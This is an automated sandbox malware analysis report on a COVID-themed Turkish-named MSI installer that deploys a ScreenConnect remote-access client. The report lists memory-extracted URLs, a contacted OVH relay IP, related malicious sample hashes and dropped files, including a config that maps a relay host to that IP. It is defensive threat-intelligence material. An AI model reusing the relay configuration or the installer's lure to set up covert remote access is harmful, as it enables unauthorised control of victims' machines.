                                                      • URL Reputation: safe
                                                      unknown
                                                      https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000F.00000002.308918837.0000022453A42000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.zhongyicts.com.cnwdthKScreenConnect.WindowsClient.exe, 00000006.00000003.242306163.000000001C6AF000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.jiyu-kobo.co.jp/Y0/XTjScreenConnect.WindowsClient.exe, 00000006.00000003.243966734.000000001C6B0000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fontbureau.com/designerseScreenConnect.WindowsClient.exe, 00000006.00000003.249982266.000000001C69A000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.jiyu-kobo.co.jp/jp/jScreenConnect.WindowsClient.exe, 00000006.00000003.243826067.000000001C6B2000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.galapagosdesign.com/DPleaseScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fonts.comScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.sandoll.co.krScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.urwpp.deDPleaseScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.zhongyicts.com.cnScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.carterandcone.comFBVScreenConnect.WindowsClient.exe, 00000006.00000003.242370795.000000001C6B0000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.jiyu-kobo.co.jp/FTVScreenConnect.WindowsClient.exe, 00000006.00000003.243966734.000000001C6B0000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScreenConnect.ClientService.exe, 00000005.00000002.462086274.00000000013A1000.00000004.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.464165504.0000000002987000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://www.fontbureau.comFcnVScreenConnect.WindowsClient.exe, 00000006.00000003.250137731.000000001C6B2000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.sakkal.comScreenConnect.WindowsClient.exe, 00000006.00000003.246683742.000000001C69A000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.bingmapsportal.comsvchost.exe, 0000000F.00000002.308821917.0000022453A13000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://www.sajatypeworks.comrBVScreenConnect.WindowsClient.exe, 00000006.00000003.239416728.000000001C6B4000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000F.00000002.308888069.0000022453A3D000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://www.apache.org/licenses/LICENSE-2.0ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://www.fontbureau.comScreenConnect.WindowsClient.exe, 00000006.00000003.245560674.000000001C6AE000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://www.jiyu-kobo.co.jp/.TTCScreenConnect.WindowsClient.exe, 00000006.00000003.244222479.000000001C6A9000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000F.00000003.308494934.0000022453A40000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000F.00000002.308888069.0000022453A3D000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vMicrosoft.Deployment.WindowsInstaller.dll.2.drfalse
                                                                                high
                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000F.00000003.286707070.0000022453A32000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000F.00000003.308494934.0000022453A40000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://en.wikipediaScreenConnect.WindowsClient.exe, 00000006.00000003.243037142.000000001C6B0000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.jiyu-kobo.co.jp/FScreenConnect.WindowsClient.exe, 00000006.00000003.243966734.000000001C6B0000.00000004.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000003.243744565.000000001C6A9000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000F.00000002.308821917.0000022453A13000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.carterandcone.comjScreenConnect.WindowsClient.exe, 00000006.00000003.242591511.000000001C6B2000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.carterandcone.comiScreenConnect.WindowsClient.exe, 00000006.00000003.242591511.000000001C6B2000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://%s.xboxlive.comsvchost.exe, 0000000C.00000002.459723080.000001FDEAC3E000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      low
                                                                                      https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000F.00000002.308950171.0000022453A4E000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000F.00000003.286707070.0000022453A32000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.jiyu-kobo.co.jp/FSVScreenConnect.WindowsClient.exe, 00000006.00000003.243826067.000000001C6B2000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.carterandcone.comlScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.fontbureau.comjScreenConnect.WindowsClient.exe, 00000006.00000003.245818296.000000001C6AA000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.fontbureau.com/designers/cabarga.htmlNScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000F.00000003.308456661.0000022453A5A000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://wixtoolset.org/releases/Microsoft.Deployment.WindowsInstaller.dll.2.drfalse
                                                                                                    high
                                                                                                    http://www.founder.com.cn/cnScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.svchost.exe, 0000000A.00000002.468910314.000001F8C5B80000.00000002.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.fontbureau.com/designers/frere-jones.htmlScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://dynamic.tsvchost.exe, 0000000F.00000002.308950171.0000022453A4E000.00000004.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://www.jiyu-kobo.co.jp/ScreenConnect.WindowsClient.exe, 00000006.00000003.243966734.000000001C6B0000.00000004.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000003.244105547.000000001C6B0000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.2.drfalse
                                                                                                            high
                                                                                                            https://%s.dnet.xboxlive.com.svchost.exe, 0000000C.00000002.459723080.000001FDEAC3E000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            low
                                                                                                            https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000F.00000003.286707070.0000022453A32000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://www.fontbureau.com/designers8ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.jiyu-kobo.co.jp/jScreenConnect.WindowsClient.exe, 00000006.00000003.243744565.000000001C6A9000.00000004.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000F.00000003.308456661.0000022453A5A000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://activity.windows.comsvchost.exe, 0000000C.00000002.459723080.000001FDEAC3E000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.carterandcone.comcomjScreenConnect.WindowsClient.exe, 00000006.00000003.242489209.000000001C6B1000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://www.fontbureau.com/designers/ScreenConnect.WindowsClient.exe, 00000006.00000003.245758311.000000001C69B000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.founder.com.cn/cn/YVScreenConnect.WindowsClient.exe, 00000006.00000003.241463050.000000001C6A9000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://%s.dnet.xboxlive.comsvchost.exe, 0000000C.00000002.459723080.000001FDEAC3E000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        low
                                                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000F.00000003.308456661.0000022453A5A000.00000004.00000001.sdmpfalse
                                                                                                                          high

                                                                                                                          Contacted IPs

                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs

                                                                                                                          Public

                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          51.77.118.172
                                                                                                                          unknownFrance
                                                                                                                          16276OVHFRfalse

                                                                                                                          Private

                                                                                                                          IP
                                                                                                                          192.168.2.1
                                                                                                                          127.0.0.1

                                                                                                                          General Information

                                                                                                                          Joe Sandbox Version:31.0.0 Emerald
                                                                                                                          Analysis ID:355327
                                                                                                                          Start date:19.02.2021
                                                                                                                          Start time:12:30:10
                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                          Overall analysis duration:0h 11m 17s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:light
                                                                                                                          Sample file name:Covid 19 bilgi y#U00f6netim sistemi.msi
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                          Number of analysed new started processes analysed:32
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • HDC enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal60.spyw.evad.winMSI@24/15@2/3
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 60%
                                                                                                                          HDC Information:
                                                                                                                          • Successful, ratio: 3.7% (good quality ratio 3.2%)
                                                                                                                          • Quality average: 74.2%
                                                                                                                          • Quality standard deviation: 35.2%
                                                                                                                          HCA Information:Failed
                                                                                                                          Cookbook Comments:
                                                                                                                          • Adjust boot time
                                                                                                                          • Enable AMSI
                                                                                                                          • Found application associated with file extension: .msi
                                                                                                                          Warnings:
                                                                                                                          Show All
                                                                                                                          • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 104.42.151.234, 13.64.90.137, 40.88.32.150, 52.147.198.201, 52.255.188.83, 51.104.144.132, 184.30.24.56, 2.20.142.210, 2.20.142.209, 92.122.213.194, 92.122.213.247, 20.54.26.129, 23.211.6.115
                                                                                                                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
                                                                                                                          • Execution Graph export aborted for target rundll32.exe, PID 6016 because it is empty
                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                          Simulations

                                                                                                                          Behavior and APIs

                                                                                                                          TimeTypeDescription
                                                                                                                          12:31:24API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                          12:32:39API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                                                          Joe Sandbox View / Context

                                                                                                                          IPs

                                                                                                                          No context

                                                                                                                          Domains

                                                                                                                          No context

                                                                                                                          ASN

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                          OVHFRce-equinix_1.0.1.apkGet hashmaliciousBrowse
                                                                                                                          • 5.135.83.77
                                                                                                                          KUmKV28Ffx.exeGet hashmaliciousBrowse
                                                                                                                          • 66.70.204.222
                                                                                                                          c4p1vG05Z8.exeGet hashmaliciousBrowse
                                                                                                                          • 51.89.123.225
                                                                                                                          KLunCDGm5W.exeGet hashmaliciousBrowse
                                                                                                                          • 167.114.145.33
                                                                                                                          Fk2R8VvodKESjNz.exeGet hashmaliciousBrowse
                                                                                                                          • 51.195.53.221
                                                                                                                          bwNz5CvLWA.exeGet hashmaliciousBrowse
                                                                                                                          • 51.195.53.221
                                                                                                                          Original Invoice.exeGet hashmaliciousBrowse
                                                                                                                          • 51.195.53.221
                                                                                                                          Shipping Details_PDF.exeGet hashmaliciousBrowse
                                                                                                                          • 51.195.53.221
                                                                                                                          barcelona-v-psg-liv-uefa-2021.htmlGet hashmaliciousBrowse
                                                                                                                          • 46.105.201.240
                                                                                                                          Barcelona-v-PSG-0tv.htmlGet hashmaliciousBrowse
                                                                                                                          • 46.105.201.240
                                                                                                                          wFzMy6hehS.exeGet hashmaliciousBrowse
                                                                                                                          • 51.89.123.225
                                                                                                                          Parcel _009887 .exeGet hashmaliciousBrowse
                                                                                                                          • 213.32.111.37
                                                                                                                          ar31Dwi59D2H6pJ.exeGet hashmaliciousBrowse
                                                                                                                          • 51.195.53.221
                                                                                                                          IU-8549 Medical report COVID-19.docGet hashmaliciousBrowse
                                                                                                                          • 79.137.83.50
                                                                                                                          vWr4r97uMA.exeGet hashmaliciousBrowse
                                                                                                                          • 66.70.204.222
                                                                                                                          instmsia.exeGet hashmaliciousBrowse
                                                                                                                          • 178.33.169.14
                                                                                                                          SecuriteInfo.com.CAP_HookExKeylogger.25342.exeGet hashmaliciousBrowse
                                                                                                                          • 51.195.53.221
                                                                                                                          HSBC Payment.exeGet hashmaliciousBrowse
                                                                                                                          • 51.195.53.221
                                                                                                                          6UYAC8WAoJ.exeGet hashmaliciousBrowse
                                                                                                                          • 66.70.204.222
                                                                                                                          Offer to Purchase.xlsxGet hashmaliciousBrowse
                                                                                                                          • 51.195.53.221

                                                                                                                          JA3 Fingerprints

                                                                                                                          No context

                                                                                                                          Dropped Files

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                          C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\Microsoft.Deployment.WindowsInstaller.dllPE0kEcDX6e.exeGet hashmaliciousBrowse
                                                                                                                            ZqCMVecKCy.exeGet hashmaliciousBrowse
                                                                                                                              BlueJeansInstaller.exeGet hashmaliciousBrowse
                                                                                                                                CluuMailManagement.5.3.0.exeGet hashmaliciousBrowse
                                                                                                                                  BlueJeansInstaller.exeGet hashmaliciousBrowse
                                                                                                                                    BlueJeans.2.25.11u.msiGet hashmaliciousBrowse
                                                                                                                                      aloha.msiGet hashmaliciousBrowse
                                                                                                                                        https://download.jetbrains.com/resharper/ReSharperUltimate.2019.3.1/JetBrains.ReSharperUltimate.2019.3.1.exeGet hashmaliciousBrowse
                                                                                                                                          Inteq.ClientSetup.exeGet hashmaliciousBrowse
                                                                                                                                            https://files.xlstat.com/releases/xlstat.exeGet hashmaliciousBrowse

                                                                                                                                              Created / dropped Files

                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4096
                                                                                                                                              Entropy (8bit):0.598865677794713
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:0Felek1GaD0JOCEfMuaaD0JOCEfMKQmD/utAl/gz2cE0fMbhEZolrRSQ2hyYIIT:08NGaD0JcaaD0JwQQ/utAg/0bjSQJ
                                                                                                                                              MD5:F22FB3FD709E79590ED926BFD8E0F190
                                                                                                                                              SHA1:45753487F84440DDD3E8F96F7E9B46540B5A0D03
                                                                                                                                              SHA-256:7E4A693F3889397EF470D2AA292718D94ECB11428AED22CC16321B72C04372EC
                                                                                                                                              SHA-512:F21658A1BDD49EF8D1FEAC34C0DDEAE04F006A2482F242D64B507E00578BDE66C4F40D5E637130D737E449397981A1FC682347834AAA3E84C3E6ABC1B1BE4300
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ......:{..(..........yA.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................yA...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xff0ca065, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):32768
                                                                                                                                              Entropy (8bit):0.09595902171711365
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Dczwl/+ylsRIE11Y8TRXJcAcVfmHKZczwl/+ylsRIE11Y8TRXJcAcVfmHK:I0+JO4blJ8xmHKy0+JO4blJ8xmHK
                                                                                                                                              MD5:A89FF319DBCCBA2C0A45F304D6C13361
                                                                                                                                              SHA1:D5683BAD18E060B0AA78D2657DEDC3315DF0FA9C
                                                                                                                                              SHA-256:DAC33DDFE08B58C8C590CE1A996B6BB6AA403357C459495898C227DBCC54F5B9
                                                                                                                                              SHA-512:A593893E1014D8BB258D2E0DB34F8136F54FD9D6EAFAB31AB88B165B7B999509E13B841C446F118B50B840710D6B33FEEAE98F733A6C8F38B34227E4D838F30C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ...e... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................F........y.m..................#......y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8192
                                                                                                                                              Entropy (8bit):0.11169102851775213
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:8lEv9PQhl/bJdAtiJm4Lqll:xeht4qmp
                                                                                                                                              MD5:A71998D04A84AA03F7486DFA04323676
                                                                                                                                              SHA1:5E0CB83EBE39980C5D122C923C9B6AA5C86280CA
                                                                                                                                              SHA-256:92AB9B89F153F73A932416DB3DBD9DFAD901CE47B512EFA8E3EFD82AF867210C
                                                                                                                                              SHA-512:F76172D24819C17E5E5C31D5FA0B994EC12FD962D626094A82D7D574C11BE6B1D4FD13871C422D44BC3B8512698923DC0E1EA402A50952989941A4CE67D5E1B7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: .LU......................................3...w.......y.......w...............w.......w....:O.....w....................#......y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              C:\ProgramData\ScreenConnect Client (5c1b63d437ba59e3)\n1llp0rc.newcfg
                                                                                                                                              Process:C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):572
                                                                                                                                              Entropy (8bit):5.035673375780102
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:TMHdGGqq9yos26K9YG6DLI4MWiNuGEoORnYPENONlqqSs8ylv/vXbo3xT:2dL9iK6E4lYPRh53vE
                                                                                                                                              MD5:3EBD8263C9CAAF0DD3590E9366EE19FF
                                                                                                                                              SHA1:B4999839B1881AEDF01ACE8CF31DB1016361F9A1
                                                                                                                                              SHA-256:315A24F9C8D2589CDBF53B73ADE6893F9563BD77D61CC3350F698DD2102B5BF0
                                                                                                                                              SHA-512:E06443050B16A91EAA24FC7B5E15EEDA855FDBF40D7AEC344C8CB9E3A64D5E4D1783CD8EEEB6AF4D3A376CD0C8420532FFE8B044C9E6B698D82DC5C00F94D2E8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.SystemSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.SystemSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-s6p2r4-relay.screenconnect.com=51.77.118.172-2%2f19%2f2021%208%3a30%3a59%20PM</value>.. </setting>.. </ScreenConnect.SystemSettings>..</configuration>
                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log
                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):651
                                                                                                                                              Entropy (8bit):5.347236198415341
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhaOK9eDLI4MNJK9zKHK9yiv:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFb
                                                                                                                                              MD5:885F8A93C0BC47F2C05B5702E49A06CE
                                                                                                                                              SHA1:C9945AF95217F2BDBBB967E65091B8EA21976F36
                                                                                                                                              SHA-256:8268A83751122A58D99D6949BFFE44B9BF905E40827CC4321677BF551BF4DD40
                                                                                                                                              SHA-512:84BC9C0FEFADE6BBFEC86F6AAA28CC7F4F4B3927A7C21D559F14A9CD9C7F3247210FFD0391DCD7FC08E255779D993E8586EC46A142981B9103BC9EC77CD7A361
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..
                                                                                                                                              C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):65536
                                                                                                                                              Entropy (8bit):0.10999720803129504
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:265STXm/Ey6q9995VwvGq3qQ10nMCldimE8eawHjcaP:26oKl68X6jLyMCldzE9BHjcaP
                                                                                                                                              MD5:2F80884040F4B1C4C84B56D2ACF7DD27
                                                                                                                                              SHA1:B5BEBBEC75C9FA6E286A020D41A29BA414BE4B10
                                                                                                                                              SHA-256:616441E792AE0731AD54CF014BA8C75059A4AF15DD8B3BD15D03AB995EA04397
                                                                                                                                              SHA-512:9CA9B9D4A0FCB03AF2FD8194F95343B44D985141CB1FB8BFC0D1EBF730434C5DD3E1286516DE3EA29E758676E24EB72378FD910EC86675EE4060AF555B82360E
                                                                                                                                              Malicious:false
